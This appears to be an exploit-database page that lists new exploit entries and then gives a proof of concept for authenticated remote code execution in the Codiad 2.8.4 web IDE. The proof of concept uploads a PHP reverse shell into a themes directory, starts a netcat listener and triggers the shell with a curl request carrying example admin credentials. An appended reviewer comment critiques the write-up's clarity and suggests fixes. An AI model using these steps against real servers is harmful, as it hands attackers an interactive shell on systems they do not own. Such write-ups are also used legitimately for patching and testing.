
9 changes to exploits/shellcodes

Dynojet Power Core 2.3.0 - Unquoted Service Path
Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)
YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)
10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated)
Ericsson Network Location MPS GMPC21 - Remote Code Execution (RCE) (Metasploit)
Ericsson Network Location MPS GMPC21 - Privilege Escalation (Metasploit)
i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
29 lines
No EOL
1.9 KiB
Text
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
# Author: P4p4_M4n3
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Type: WebApp
###################-------------------------##########################------------###################
# Proof of Concept: #
# #
# 1- login on codiad #
# #
# 2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory #
# #
# 3- right click and select upload file #
# #
# 4- click on "Drag file or Click Here To Upload" and select your reverse_shell file #
# #
###################-------------------------#########################-------------###################
after that your file should be in INF directory, right click on your file and select delete,
and you will see the full path of your file
run it in your terminal with "curl" and boom!!
/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php
1 - # nc -lnvp 1234
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd" |
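Review bot: The write-up never states the underlying condition, only the clicks that reach it: an authenticated user can place a .php file under the web root at ".../example/INF/" and the server executes it when requested. One sentence saying so near the header would tell a reader what to fix (upload extension filtering, no script execution in that directory). The header block also gives only title, author, vendor homepage, software link and type; a date and a "Tested on" line are missing, and the affected version appears only in the title. In step 2 the directory string ends with a stray double quote after "INF/" that has no opening quote. The last two lines restart numbering at 1 after steps 1 to 4, and "1 - # nc -lnvp 1234" mixes a step number with a shell prompt marker, so it is unclear whether "#" belongs to the command. Finally, the curl line passes -u "admin:P@ssw0rd" while step 1 only says "login on codiad"; say what those credentials authenticate to and mark them as example values.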